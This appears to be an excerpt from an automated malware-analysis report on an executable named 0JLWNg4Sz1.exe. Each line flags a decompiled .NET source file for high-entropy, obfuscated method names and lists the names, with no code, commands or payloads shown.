Source: 0JLWNg4Sz1.exe, K1KWTquHpDck1jMcI6Z.cs High entropy of concatenated method names: 'TlIu0mlljG', 'Vdhu271Kp5', 'KLOuyMJfZx', 'DH1uEwnGMt', 'RcKuGThJvD', 'lDHv75byrFFrRNhUybrY', 'QxL5BVbyZ3WA8nNfCMEU', 'ljYtbybyfeJ4iU9qpq2j', 'dOSx0NbyMVLlNS1RT2dm', 'axUNCZbyhZkUrgpVbh0x'
Source: 0JLWNg4Sz1.exe, gsIJJF8tgc6Kt27dkwS.cs High entropy of concatenated method names: 'fe68pWdh1r', 'gTsdoxbdZC2Fspgjcc4H', 'q7S5gYbdMCF999Rrt4q1', 'BmNvxEbdrSA3AlBfKXXa', 'JhttbKbdhYNJBLbu3sh4', 'CFiNx1bd9INowrYGSQFK', 'E94', 'P9X', 'vmethod_0', 'UHobALNJmxy'
Source: 0JLWNg4Sz1.exe, TQZFwlmIrZ94Ckj1ie0.cs High entropy of concatenated method names: 'VTPm4CpBdl', 'PjfmQiHqWr', 'ypymRt8q1s', 'DV2megEWrI', 'MwWgyLbBOBVDhPTmhCIg', 'NRPgxZbBslb3MYS02OMM', 'TuB7BVbBin1VL70pVV8R', 'kPhXombB1G7TCmnRtoKx', 'LcG07pbBNRhcQKiOUESt', 'T2stNkbBoe9CtcjDe67C'
Source: 0JLWNg4Sz1.exe, Qs2EjnxoMOtvc9JmZIW.cs High entropy of concatenated method names: 'zH8XtnbabSRQq9yG1Ljh', 'FKcJkhbamqmlJ65n4BNJ', 'L8vFKaRfXY', 'B6MjVfba81bWIgDFCTaM', 'OZ0hthba4LMTQoBKaPAy', 'MPsuxZbaQVmdjnfwA659', 'DiMmhnbaRQ4SFd7oj0gf', 'IDTRi0baesNdXtQ4Q7av', 'RqUlBGba3F948o5vfdau', 'OLdwE1baYiQXCH1fS66v'
Source: 0JLWNg4Sz1.exe, cqcxESRi8Qvb9t4Tgvw.cs High entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'iOsgLkbq7s2M10pD9cEN', 'IAH09WbqqXwkKxrRt3iu', 'my6kvMbqfoxlsbNm0tFp', 'NMI5LxbqMA9kyAQEdpZq'
Source: 0JLWNg4Sz1.exe, KxK9Qybvk5n8x4G07sb.cs High entropy of concatenated method names: 'KZ3', 'fW4', 'imethod_0', 'U7v', 'z4ObQbBwwbR', 'PdlbAbXx1ob', 'tD77jFbwzeN2JvYn2qnu', 'LETqlmbB6Q9bSm4Q23pr', 'MCiQRfbBbTS73maCItFb', 'eEcCwYbBm7E3Uw8d9SjC'
Source: 0JLWNg4Sz1.exe, ooARSMLin5qekEb8tpe.cs High entropy of concatenated method names: 'lRCLLihWHh', 'I37XdLbhXtHKHxgdSgKN', 'DhlOhUbhlnNmbnKZ6YIP', 'LileNqbhHjZEOWoGKVvB', 'CpjL1UpJMG', 'SpJGN6bhraGUjRngI4hK', 'Cy74SLbhf74jmJERBHcI', 'lOuduJbhMn8c3Qa3Mm6a', 'JwWjBpbhZve8ht3D4nHp', 'DVCtuobhh1LJqMIXV5Hv'
Source: 0JLWNg4Sz1.exe, Kn8eXxtlnhiK1oa4UCS.cs High entropy of concatenated method names: 'a99', 'yzL', 'method_0', 'method_1', 'x77', 'bKetXW5XQP', 'aivt0blEHP', 'Dispose', 'D31', 'wNK'
Source: 0JLWNg4Sz1.exe, i2aq4wrpD6Y5bc2DjVZ.cs High entropy of concatenated method names: 'HHbrc6Vg50', 'A8ur7vvgAB', 'Borrq2KiBQ', 'MmfrfXyfBA', 'lDLrMEI4EN', 'K5Nrrv69oo', 'Ob7rZklL0A', 'dB6rhEo0pr', 'v1tr9dkh3S', 'xi6rj5invC'
Source: 0JLWNg4Sz1.exe, mRZXS6Dpm1rHtQeiq6i.cs High entropy of concatenated method names: 'DB4', 'method_0', 'method_1', 'method_2', 'method_3', 'method_4', 'method_5', 'A47', 'fC4', 'aK3'
Source: 0JLWNg4Sz1.exe, TWhndcQNKwUpnrBVNCI.cs High entropy of concatenated method names: 'nqDQLR3Iir', 'qZPUApb7cH4xadES5qE3', 'WGtysgb7p0ob25jCb8yE', 'GjFZFJb7dVvBIh71d4Ql', 'qRxgKUb77u6BJsMCcXlE', 'MBdQWKnmyl', 'AG4aSPb7ggOFlBX8dQcw', 'Y6bSL8b7wNSOltY0V0en', 'EqouQyb7BrNk66pg7uSK', 'POMyR5b7t03uUkH0GFJf'
Source: 0JLWNg4Sz1.exe, Ssmwo8pF64YjXD4m3sZ.cs High entropy of concatenated method names: 'uhFpv3IPQx', 'G56pzDTgcR', 'D5Nd6bXk8h', 'owfdbYITc1', 'NZcdmvVBGf', 'XLwdPxsWxc', 'Rpx', 'method_4', 'f6W', 'uL1'
Source: 0JLWNg4Sz1.exe, P0wmQMnG47j70UOUgsZ.cs High entropy of concatenated method names: 'smJnKOxiXC', 'rM0nkMUdS9', 'PMqn5fypff', 'hfgnxMfK1l', 'XJsnFaYyYJ', 'DG55vcbl2IKksSZlxpEt', 'ILPABsblyCYwUPPSPF8a', 'SXMcLtblEXI0hkWurl4h', 'gLZOKrblGOR9QBKVCTVl', 'o6UIIRblTOPbcirf7OGq'
Source: 0JLWNg4Sz1.exe, did8cBSBSiw9xBIYVAt.cs High entropy of concatenated method names: 'NOUSfR9CN2', 'qKYBEgbZa5ppQxe84Xf1', 'rWtbTjbZxIE43ksx2ctx', 'eqobVNbZFwNbCreJ0f6W', 'JmkSuckgOj', 'WakSp13bV9', 'pJBSdfi0ho', 'JOoC4gbZKoLYTXAmDuER', 'qGQQPHbZkN2cPHLamCe5', 'WQppifbZGXxhLIF3kqLM'
Source: 0JLWNg4Sz1.exe, LcXJJV7Mfm5N28NO9Mo.cs High entropy of concatenated method names: 'q13', 'Sw1', 'method_0', 'LqX7Z6iNRV', 'VFK7hKAgEb', 'xO2795WGyF', 'YYK7jcROxN', 'u8r7lfC4aH', 'mZm7Hi8afT', 'wlBAPBbG7r9GX1NIXHwS'
Source: 0JLWNg4Sz1.exe, uEMWelmp6xeXiI6VZSX.cs High entropy of concatenated method names: 'opYm9omlr6', 'wVRmjbFyDD', 'RmdaF8bBhcM9m8G7uZq8', 'wSJ7KKbBrfLNQ8IAidry', 'TewlrZbBZg6i7nTwAPM3', 'rUx39ZbB9sTnnVM4qcg7', 'fMnm02VX4W', 'yiZvbNbBXmsygpwavyaM', 'AqVxsCbBldSMOauJh9oe', 'beM0XTbBHGoZsSWoFAfY'
Source: 0JLWNg4Sz1.exe, QsZr5IPgGuujSxCAeqQ.cs High entropy of concatenated method names: 'mWvPjYR93r', 'zxFPlQ5Lvl', 'pD4PHEsZt6', 'gCdaShbDHEwC1jbpXCgE', 'NDHqnlbDXlqkIZtMbL6C', 'RIeb23bDjZm11leXu3Nb', 'VZ9L8CbDlUnZYGtHnj1s', 'iNDPB30Yd0', 'RiUPDdDPtt', 'BqdPuiF4gp'
Source: 0JLWNg4Sz1.exe, rgnIQeIlr9OZA9ElV1Y.cs High entropy of concatenated method names: 'g2KIyS5KDe', 'RFjsR9bdm6S8r6FoL4TL', 'EqGvawbdP5ikb8IhIQ1y', 'kQtndobdArauXDaSIWIC', 'U1J', 'P9X', 'CB5bA1i5UGJ', 'FZhbANIkNWk', 'SwJbQ4NjuXr', 'imethod_0'
Source: 0JLWNg4Sz1.exe, F7oDlppQ7cuKQFlxLX5.cs High entropy of concatenated method names: 'fsapeyyWcY', 'eS0p3j9heS', 'method_0', 'method_1', 'I27', 'c6a', 'C5p', 'jK2pYyka8b', 'method_2', 'uc7'
Source: 0JLWNg4Sz1.exe, xXAvLnzYYgF1S8rWtx.cs High entropy of concatenated method names: 'WcxbbZfouC', 'J4ZbPCAJuX', 'wJcbAFsaYk', 'DrDbIeBv0j', 'xh8b8qtP5A', 'Nncb4fK2Sl', 'cr7bRUUtq6', 'Dvg705bwRqd9oCw9J2mw', 'CiJmR4bwe9OWnE80EppE', 'JfwkoWbw3OPRu9Xq7UDa'
Source: 0JLWNg4Sz1.exe, I8ZhR9cq9dQNRp8jSrL.cs High entropy of concatenated method names: 'Close', 'qL6', 'TjYcMv0lJX', 'EaHcrnvblD', 'k3xcZ3nKuy', 'Write', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'get_Length'
Source: 0JLWNg4Sz1.exe, v2VQvVbKRcWBkrETNK9.cs High entropy of concatenated method names: 'P9X', 'gQLb5ImlGV', 'KZcbQ6Oa4nK', 'imethod_0', 'q28bxZP6Sg', 'Mw8gn8bw5TBfBOj3Smo1', 'dfmZ6AbwxMT5kjlaWJuR', 'vhIR8jbwKTgVpAe8N2r6', 'mwW3Z3bwkCu4XqZmqaj9', 'wqChU7bwFSU1lBP23VNF'
Source: 0JLWNg4Sz1.exe, yc3dPprHKSGAWfjjOTe.cs High entropy of concatenated method names: 'wbkbQtq0Zln', 'qYWr0TUYwv', 'p4Ur244sfc', 'MKAryKx1B1', 'nBHLHObKo1IP6u7P30nk', 'ofbnuGbKWynTFpPkmGHP', 'CGFjagbKSvZ4hb27KuGE', 'cBJybqbKLCa1he8mRoPc', 'RSGiJ0bKJKlyxNVE43s1', 'WmJtkNbKUpB3pJPHIfCl'
Source: 0JLWNg4Sz1.exe, bO8JFAAd3ZAlHLFJ6eR.cs High entropy of concatenated method names: 'KZ3', 'imethod_0', 'vmethod_0', 'tSXbQAXSZJu', 'PdlbAbXx1ob', 'e6sJGjbuciQt6jHr8XSv', 'qejCx5bu7aeQ6djOkIty', 'Il2sC9buqwXH90lWp3FW', 'wtx1J6bufqjPZphTEDys', 'CyS4SQbuMMG0CQDfe79J'
Source: 0JLWNg4Sz1.exe, TjDulSuvXpZoRMMd7L9.cs High entropy of concatenated method names: 'WwJp6w5kkN', 'cd8pbCBnOk', 'Yd7', 'O27pmE2Uuj', 'ngTpPtkfUh', 'R10pAZJDkF', 'BNRpIjphdT', 'BM893sbyyk0kMf6yn1Ch', 'KO05r2byEyLHQmwPQZ3a', 'lRopdbbyG3oTZ97Z9Veo'
Source: 0JLWNg4Sz1.exe, t56Qn6PEBQPJ6naQoFO.cs High entropy of concatenated method names: 'IBjAPGcYj4', 'eBMAAiL7Yc', 'UPYAIRoCsl', 'fsIlknbuAEN1Iv4grxJA', 'VBWgtabuIRaqYVRTB3xt', 'kvmKO2bumdvjCUkU4lA2', 'EKyFJrbuPw9pPSo2HaM8', 'cxeA32qpxH', 'yiYvBJbuRdEO4ixi4GRa', 'Al6fgwbu4dLZvjVEjeTg'
Source: 0JLWNg4Sz1.exe, ybZP7aQIdKRh1BejQUR.cs High entropy of concatenated method names: 'O3I', 'P9X', 'ntqbAVj4H6W', 'vmethod_0', 'imethod_0', 'BC2wg9b7si4qKnFT81Ci', 'gmsvAub7iMvgM86yxI5U', 'rgYeRsb73dKGPLQ7hQHU', 'UVbpOAb7YSJJFIi9PEmc', 'aac2qhb7OLZDUWmd39uC'
Source: 0JLWNg4Sz1.exe, hXM1RKoIXZXneRvfhe.cs High entropy of concatenated method names: 'brn73YGNu', 'BIkbWMbgpC6rSR5mTi7q', 'LsYTB7bgdYvAivxMQfs7', 'tyEI03bgDKLEZJXrFG9r', 'KNUmnibguYm0I07DxPto', 'GuhSkja9H', 'qpaLEe9KI', 'jynJpgQaR', 'occUg5S9U', 'umCCtUjpI'
Source: 0JLWNg4Sz1.exe, jgOfPCIGSkBKDbnxjsT.cs High entropy of concatenated method names: 'wa4IFfJWI1', 'WQbIaJ636q', 'x76IvtasX1', 'BraIz7xLoQ', 'gCI867VgWx', 'J208bC7dhV', 'gTJ8mn4lpf', 'pp5Yktbdin8p9NoaqcWY', 'AuFRrtbdO9baaMtwEY4k', 'Gv3D3tbdYgv51Vh2OoKa'
Source: 0JLWNg4Sz1.exe, IPNsrUgpsIdnQCbNZhO.cs High entropy of concatenated method names: 'method_0', 'C0MgcpV4HG', 'UXQg75QB9o', 'g9pgqqdPv4', 'RAkgfhSD16', 'yxigMl4ZcY', 'o96grIpmLj', 'DogMUebXSvGrLMkpFpod', 'KqndnGbXo9KyHZ2JB2IR', 'tfppWjbXWj8yAd1WjiIk'
Source: 0JLWNg4Sz1.exe, zfYiH1AZnhdHb38sJ98.cs High entropy of concatenated method names: 'kjHAarsX9A', 'c9MvWBbpApARR9RwuruN', 'gCogZtbpIuWuTIodVTBv', 'JAoaSlbpmKA0cEYvoitf', 'eG6OuxbpPRaO2YlfyGMJ', 'WUWYZGbpRmwPraRZ7Kgs', 'U4w44Rbp4xBqn6MiCeBW', 'wt2X5CbpQfCdT3f8tMkv', 'neeEwubpelBSa06Cg0vt', 'iUbI8NJsKR'
Source: 0JLWNg4Sz1.exe, ES5rquZpoZAAnv5Doa4.cs High entropy of concatenated method names: 'RetZcuoBhd', 'iTbZ7QBfOg', 'u5UZqZ66Vt', 'H6dZf8dhO8', 's8PZM5BEXP', 'pbnZrTblBH', 'tbwZZQFKck', 'GCiZhUPpPu', 'sfAZ9y880s', 'KIFZj2MVkg'
Source: 0JLWNg4Sz1.exe, d3KjZrI7sthRG79BAKM.cs High entropy of concatenated method names: 'l29', 'P9X', 'vmethod_0', 'cpGbA3bjavR', 'reFIfIg0Ny', 'imethod_0', 'ERiND7bp9GjwrScPk6Ey', 'yjNEafbpjlror3jSFgWP', 'gbSSilbplbIYubsiNRAf', 'fcWy0nbpH0nevdPIKnqC'
Source: 0JLWNg4Sz1.exe, lLsTi2wPNhEUYZSa5Ic.cs High entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'NV6wIkRvdy', 'Write', 'NXow8SZX5h', 'nnEw4EyUhK', 'Flush', 'vl7'
Source: 0JLWNg4Sz1.exe, g0mC6MQXJrY7NdpcS30.cs High entropy of concatenated method names: 'fcEQ5gpgqR', 'uIpxBZbqY9y4P5QKF8Wf', 'avvGW3bqeMegw6wYeToc', 'IjsviYbq3Bs5TwB7xEAu', 'myyiF6bqsCQ2nrNQSRB4', 'P9X', 'vmethod_0', 'ijvbAw8IGON', 'imethod_0', 'AmV1gAbq8dKosmZmMRZc'
Source: 0JLWNg4Sz1.exe, l0haC3QwJqAsbJN04UF.cs High entropy of concatenated method names: 'mU8QDTlfVt', 'rBrQuinQST', 'iSlQpV2Pi4', 'kYDQdEbD9v', 'q0jQcs9Bfw', 'bBUQ7fFfo4', 'NILflGb7yxFatl0uJw1b', 'idBQdVb7ElqKJFSAlGWf', 'D8Iw91b7GH3hne2iEOoN', 'JEijpYb7TyNxaNy6FdCG'
Source: 0JLWNg4Sz1.exe, T9WJvy5siHytZdkYCSK.cs High entropy of concatenated method names: 'MZu51uNABU', 'OKw5SZhVLb', 'CqT5UxMagu', 'h7y5C6nJSV', 'fJq5nOkbmD', 'lOs5tmt39x', 'x6o5VKPGu3', 'qbh5gxdiKX', 'Dispose', 'EyYoHjbFAkZKL6ulPk23'
Source: 0JLWNg4Sz1.exe, WwK3d2aiJO0tV2nA8Ro.cs High entropy of concatenated method names: 'ST5mIdcdDJI', 'vicmIclHRnv', 'vGX9KgbauanjpLdC32rZ', 'KFMv7bbapSqRA9My4Slf', 'hkmhaAbadQtKHBHZxStr', 'pXagANbacQXxHv1kIP8a', 'oo5UV2ba7wky7M3VpV6O'
Source: 0JLWNg4Sz1.exe, G3ng6bmEg2NnX6OJK55.cs High entropy of concatenated method names: 'NxNP4PPfvj', 'xHv7l1bDbBcCfWBNtomC', 'TRipZNbDm6G7BD9cxXGU', 'GriWZubDPOML7HWioRtr', 'eSi1tTbBznY7Y40mT104', 'XEoQaJbD6JWVg5tZ64hR', 'fDpARPbDA8wbvvW4Eu0R', 'XdoP6Qa0qd', 'n8EPm8MCUM', 'aYHPPiIvF7'
Source: 0JLWNg4Sz1.exe, m8bnl8L55T72dLEBlaQ.cs High entropy of concatenated method names: 'w52', 'o38', 'vmethod_0', 'WsNLFDEmuI', 'JiKbQWrUSUl', 'QStgwcb9BorWT4x9LD2Z', 'a2Au9ab9gfEg6HOsejBl', 'Fc5BRUb9wM2Prmtuebp6', 'jiys1ab9DF4l9he9aUUm', 'UiI3P9b9uCABYybER9Nl'
Source: 0JLWNg4Sz1.exe, CKHAaTrRBZ3vc0rSSMd.cs High entropy of concatenated method names: 'SmQrttcvO6', 'kKHh92bK8ofimpo11QFS', 'hs5KZrbK42eg8JBAkgKF', 'rxyYwfbKAHftg37aZGDd', 'hFLywGbKI5G7SXkp8wU9', 'IPy', 'method_0', 'method_1', 'method_2', 'vmethod_0'
Source: 0JLWNg4Sz1.exe, LYF8x3KMkw2ZP2d0YDG.cs High entropy of concatenated method names: 'mwFbQgNbWkB', 'jwDb8VPpRny', 'bjXMv6bxPAWwZRdvtAJt', 'OMxNL9bxbIlUSHFrvP1h', 'rFBXOrbxmssuGVWs3bsQ', 'fwcHcSbxAMncMB2Ywd6x', 'zq3rRRbx87Zq6m7Co73r', 'x2DxKQbx4CU40RaFlSFy', 'CH2UgZbxQZPMcYpMPCnl', 'imethod_0'
Source: 0JLWNg4Sz1.exe, oC7amm4RQG8WfHWfygR.cs High entropy of concatenated method names: 'JWw43GwoCR', 'CHf4YrF0px', 'Hg0gN1bcNEnQ3W1lSdOo', 'IU0yUebcOUjP80M1DIuN', 'fWyjXVbc1vmlakBJ8YgV', 'c53UkQbcoxxq7FWuLsBw', 'L4x5fPbcWxhiJnmR82Mh', 'gkUsNebcSXEYEiNbRxP8'
Source: 0JLWNg4Sz1.exe, QIE7HsKpvhlpcEmjKXN.cs High entropy of concatenated method names: 'method_0', 'h59', 'R73', 'rKoKckQBbU', 'Jj6fRlb5pFHtIa1r1uFV', 'bdAHTWb5daLLiqNX6iwu', 'aXheh2b5c9qAaqZXZide', 'tmVMUZb570ZXe1KqnMYk', 'tyN9wFb5q3LNeOARZWMo', 'Ru3Fglb5fu6KuDo6Qfiy'
Source: 0JLWNg4Sz1.exe, SF80mm87HsL0NUZ7oPJ.cs High entropy of concatenated method names: 'P83', 'KZ3', 'TH7', 'imethod_0', 'vmethod_0', 'dLgbQeKQrgO', 'PdlbAbXx1ob', 'Nt6gG9bdlw7NYmEYjvd0', 'zvOFPKbdHkFrxx7lQERW', 'G3dBBIbdXls3UnxuyroQ'
Source: 0JLWNg4Sz1.exe, Ta5YhNfqBOqujlHd8a0.cs High entropy of concatenated method names: 'Dispose', 'MoveNext', 'get_Current', 'Reset', 'get_Current', 'GetEnumerator', 'GetEnumerator', 'Guq3TIbTUqCvNm3krE1A', 'dcTmCxbTLKeqLfjue5nc', 'h2ob4GbTJHqTFXeb2aLp'
Source: 0JLWNg4Sz1.exe, P6T7Tb49C9xOmYMOwCl.cs High entropy of concatenated method names: 'PTu45Ge5f3', 'BRF4xcpPjq', 'zmaMibb7IobC1Zs1S0kV', 'PDYKykb78v27Sv6mmP4F', 'W9v4l3dtCn', 'wVH4H0CoFp', 'xsX4XBBmOX', 'uVx40Lbtms', 'MXd424P4eY', 'Tsh4yBw7PY'
Source: 0JLWNg4Sz1.exe, MRAl0GIZEPGAxLPqvt3.cs High entropy of concatenated method names: 'q64', 'P9X', 'xJLbAipDaHa', 'vmethod_0', 'r9DbQ8MmIEi', 'imethod_0', 'rHixBZbpE5IhOfQWG1i6', 'yaQd3abpG2ONCGFhpDEQ', 'wdamVFbpTBYmL3Dnjngs', 'NgWQrPbpK2sIMtoSdxCa'
Source: 0JLWNg4Sz1.exe, L6R8fXmLAk8EvkGmlSM.cs High entropy of concatenated method names: 'fjImUHWx5V', 'p0UmCewtKW', 'yVCXQXbBguAyY1KYNM6o', 'AcupoVbBwnDqPwPOJ8Ts', 'T3kbw2bBBfl8Wqp2L3Z3', 'HNM4DUbBDPDNkeqIR6CZ', 'YSESuPbBuByQ4o6slBhV', 'gqbBrfbBpnvLxp7wfLec'
Source: 0JLWNg4Sz1.exe, gZeU985hEAJd8mn80wu.cs High entropy of concatenated method names: 'method_0', 'method_1', 'IP25jdfn6I', 'uiQ5lIwcck', 'DMV5HmrywR', 'Dispose', 'OlG3U0bFLXWwncKJYAgC', 'TYPgaKbFJybhIBUh5lNr', 'CsTLBubFUhckEw2O3BAW', 'PYdbVXbFCaEDqpbrGU1C'
Source: 0JLWNg4Sz1.exe, QQwSq6Jbr3ePeqrlNbU.cs High entropy of concatenated method names: 'rC9', 'method_0', 'k63bQSHLPeA', 'cakbQL60Qoh', 'lOdoMRb9cQSBGTfr0MJp', 's5Ljmlb97mux0eoIpr4S', 'MTkA0sb9q0Ody7LCrk1l', 'PTQUPVb9fVyQNO31kjnB', 'X4lkGqb9Mn7t2xfkJkXi', 'TFW5fvb9r02cmYeeCdra'
Source: 0JLWNg4Sz1.exe, alltXiUsPRGraeial9Z.cs High entropy of concatenated method names: 'o0DnbKIwvG', 'hd4Yg9blCsR2ZPSrHFyn', 'imZaknblJ6McB1sE9elE', 'NxbOyjblU8lDyHNiAZhD', 'o3UYdNbln6DN7JoLfxaV', 'C1BUOgYhtC', 'VYuU1mymoo', 'NhsUNCNa4i', 'TsTUomj5wW', 'VFOUWdOWAU'
Source: 0JLWNg4Sz1.exe, BiGMOUBTBON1cqgSoIM.cs High entropy of concatenated method names: 'Ne8BkNeadc', 'ObmB5h1pum', 'utoBxThBaF', 'fCKBFkJ7PW', 'QfeBaGNXPg', 'OgrZ8Vb09MXidj876DMi', 'C5mEtlb0Zd5ymx41QMXe', 'RUCyrJb0hNcvQSq0exp9', 'mPeP0fb0jeqSE7IEiILK', 'YXXTn3b0lv8K7uPIPBJW'
Source: 0JLWNg4Sz1.exe, Qy7wX2SK0PUTXEoL22I.cs High entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'OZebQsAWCWN', 'BsZbAXZTe81', 'uB77IZbh1FoyMknNTPx2', 'eZKe13bhNPvf8h1V2Eue', 'eQQMSmbhop4YZAcBBlSn', 'PAKBc5bhW7yImVFPnCHE', 'xAGNYTbhSZni8N6ebC85'
Source: 0JLWNg4Sz1.exe, LM0kccAVQ5qbMJjpZFH.cs High entropy of concatenated method names: 'VZq', 'KZ3', 'XA4', 'imethod_0', 'e23', 'n2HbQPyjNdG', 'PdlbAbXx1ob', 'Q6UO4dbunHFvTWcnTkXL', 'lpaoawbutmCvYXEXWOZl', 'amJ92wbuV7dgNUA9PESA'
Source: 0JLWNg4Sz1.exe, u4Lt9yBv3ln6Ey5gaQr.cs High entropy of concatenated method names: 'ecnD6Td8Gh', 'Lr2DbLWIlj', 'd6WDmDM16n', 'YQtDPc1qER', 'PJwDA0kQMW', 'Tj6DIxy2sL', 'mpJ1fXb02wKHjqVHkT0l', 'q8TBNib0yLU9Sf51mHvQ', 'XHfDNYb0EymHlV7vt7mJ', 'jEehVNb0GYDGJ0k9dLKw'
Source: 0JLWNg4Sz1.exe, FOoCLDOClwF6n8gRt6h.cs High entropy of concatenated method names: 'dYZSsgNPP1', 'cAdSioTOy0', 'FbCYaWbZZBSRBpE3Cyrj', 'fLhVw9bZMKRb215d6aSe', 'd31iRLbZrRJkUAbiBQpw', 'xwFA9CbZhDoxEeHf7Zem', 'TIBINSbZ9Z6hdN0U8rky', 'f8GSSeSuPd', 'G4NIZ6bZl5tMNTsh7Lk1', 'IQrlCMbZHQkkhf8MEks9'
Source: 0JLWNg4Sz1.exe, KAxV1cLyU3xgnSNaKuN.cs High entropy of concatenated method names: 'P8ibQNOjVVl', 'aTYLGA033S', 'catbQoeQP2T', 'XqgUK0b9LQw8hs5Tv982', 'JaLguub9Jkf1TdvkqhSe', 'S2E2W5b9W7E0GhotinQa', 'wJcUupb9SjOHo3du7xjw', 'CqrOnfb9U3yuW6WmYP6N', 'dWu3t6b9CXOKs6n64NhQ', 'SVkKYbb9nBwZl3YMav5Q'
Source: 0JLWNg4Sz1.exe, RqEvCqRnA6B1x1Fg18M.cs High entropy of concatenated method names: 'VuM4HObMfKXYawIseyxq', 'A2rlJDbM7oEgFFIWWYU8', 'P9eqaTbMqZFbTghGwafA', 'Cqi8dJbMMk7TkvZ0Ixwe', 'SbyivyPaZB', 'EDHgFqbM9yrAvq72qDqO', 'm9HRjEbMZVsedoDeexwt', 'hQEn8hbMhck4OZ8bG4Mh', 'cvDObC6xjR', 'tTjBaIbMlPXxxfQLXFAk'
Source: 0JLWNg4Sz1.exe, omprTgJIEboMH3ZuGKb.cs High entropy of concatenated method names: 'method_0', 'method_1', 'K47', 'NZtJ42alAh', 'vmethod_0', 'vJtJQjUSnw', 'kG3bQJKA3IC', 'q1cjEGb9l9W0uHVsDqeX', 'yE8Z07b99VG1VqqU9EPP', 'TWqFDqb9jN4ip3eL7ytx'
Source: 0JLWNg4Sz1.exe, CSPVqRLrUaeKAxBnaO3.cs High entropy of concatenated method names: 'N2N', 'aHhbQOERq0N', 'VFELhdgNFy', 'k23bQ1AZtvv', 'na8V0vb98huPSGdeodOf', 'IybwnNb94dqjOYO6RAjg', 'iKEm8Zb9ATDkfMeG0kVS', 'rD62aYb9IZ2jXM3184B6', 'PhiFxGb9QtH8deqgrwms', 'OAK1N2b9RjOsYyW7LV0e'
Source: 0JLWNg4Sz1.exe, JMxt9k5p32I4KCJCsdm.cs High entropy of concatenated method names: 'AgA5cf9HxC', 'Pui57H0iHM', 'IH85qPwkuN', 'sHy5fpmInH', 'Dispose', 'xqscH3bFsLhiInO7HSIu', 'U3D7nobF3IB8hkoPuRqP', 'sSqQygbFYlsh4FpfW27k', 'Oocu5kbFinRBQCywvkDm', 'LsRYcEbFOjE2lgvd1NLt'
Source: 0JLWNg4Sz1.exe, euDXq5lAyGT9uTRTSc.cs High entropy of concatenated method names: 'IndexOf', 'Insert', 'RemoveAt', 'get_Item', 'set_Item', 'method_2', 'Add', 'Clear', 'Contains', 'tWrXJe7SP'
Source: 0JLWNg4Sz1.exe, QMhsB8bWQINTVsc31X9.cs High entropy of concatenated method names: 'RTM', 'KZ3', 'H7p', 'eeS', 'imethod_0', 'XbG', 'en4b4z5KTR3', 'PdlbAbXx1ob', 'LcxrBybwCnYSwd5sYVGA', 'REjpcAbwnyUCWRbSplHO'
Source: 0JLWNg4Sz1.exe, rb71eNw9GHN98tUkc5T.cs High entropy of concatenated method names: 'FTcwaxXNdg', 'oI4wzsswMn', 'sYdwlSrkvh', 'kLlwHESJt5', 'AbvwXtXZru', 's9Yw0jC0ZX', 'WUWw2mkmXl', 'gdowyJQ5nB', 'zjuwEwKexo', 'm9RwGVKGVA'
Source: 0JLWNg4Sz1.exe, g1lOkGZxrBxCWmoVRYP.cs High entropy of concatenated method names: 'MSnZaohooQ', 'hrlZvP15WE', 'otKZz159uZ', 'FdKh6N3fS1', 'r2qhbnyZvv', 'qRthm08NRk', 'YO2hPRRlVW', 'ggZhAjrAdR', 'bt1hI3CyZb', 'xYXh8PHeZy'
Source: 0JLWNg4Sz1.exe, NldO1wI1ZRNSSGGvm6u.cs High entropy of concatenated method names: 'PthIwIJLJ8', 'ULbIB3ha3n', 'sZ6IDRYSZC', 'gJAtQwbpZUDyBNN07sNV', 'N91UmIbpMgxRjF5vvylT', 'QtLsMMbprc4OUbYtsNMS', 'SfhInbAHfD', 'lJMItWhp2c', 'Th9Ch7bp74KGauiXEFvC', 'VN9DaJbpqwTeWwZqcmfF'
Source: 0JLWNg4Sz1.exe, UDNl7ZJ1t2cRHZPrh9Z.cs High entropy of concatenated method names: 'DXa8YpbjOuncu01UesLB', 'F19w23bj1IMwTFujDU03', 'Sg8Js2bjsKPY0N7d7KUM', 'nMeeXAbji8LMBU8Y0C5c', 'method_0', 'method_1', 'JcfJoRYe4X', 'TeBJWMfvnd', 'ggcJSpWQ52', 'xaFJLijZC2'
Source: 0JLWNg4Sz1.exe, wgUbhRRmoxBiwNGOuoV.cs High entropy of concatenated method names: 'NMCRAsyWOH', 'qUHRI7ok7V', 'V9KR8qaIyv', 'kppR48MouJ', 'kIIRQpGd7q', 'VirRRuyIsL', 'FrZReynXXD', 'XguR3awwZl', 'UIeRYGkbjj', 'pvfRsBLEUH'
Source: 0JLWNg4Sz1.exe, W1MqfXdJMaPI8y9q2Sv.cs High entropy of concatenated method names: 'caFci0PaYt', 'ctdfKhbEH0BIHn6P6weO', 'oIGLPIbEjJxSmVE7HSml', 'XFL7Q8bElOSpdccYEiyI', 'kPxubGbEXkB57qR1i9CW', 'kt5', 'AHFdCTtBjn', 'ReadByte', 'get_CanRead', 'get_CanSeek'
Source: 0JLWNg4Sz1.exe, kYSjZaDh6h9BTBOkcKV.cs High entropy of concatenated method names: 'OY6DjMhrKE', 'u5SDlLZ476', 'bjYDHhX029', 'iAkDXRR7cU', 'a6qD0MlvOU', 'EbTD2Zq7Ji', 'EFHDyCyuQn', 'DVoDEUtfCa', 'BW3DGFsmhL', 'F44DTXxjLZ'
Source: 0JLWNg4Sz1.exe, S6TtBBaZoTTKOAkZZlK.cs High entropy of concatenated method names: 'Vsjb8d3UJCi', 'PA7b8cqSI81', 'cbIb87IJQLm', 'RlLb8qn5v7k', 'NgWb8fMeX6q', 'qcjb8MPp5BL', 'KHeb8rjcHh1', 'jQnvISQ1hN', 'pM4b8Z5Z0QD', 'IH2b8hGIbgN'
Source: 0JLWNg4Sz1.exe, M9vuuWx6GBvjLeTm4nX.cs High entropy of concatenated method names: 'HYfxAPK7xC', 'eJtxI0Tq4w', 'q3OHNUbF9MGVC4bu37r4', 'YJRvNfbFZ7shy4aThuwg', 'pqY9e3bFh1iac7KWmqFr', 'JxwYkXbFjEdjmiYfZCCl', 'jsfV46bFl9DU691aE52W', 'mRxZLmbFHm69jh40uZpt', 'si7xmUQSyt', 'wTlufGbFqAXPpPYrDh7c'
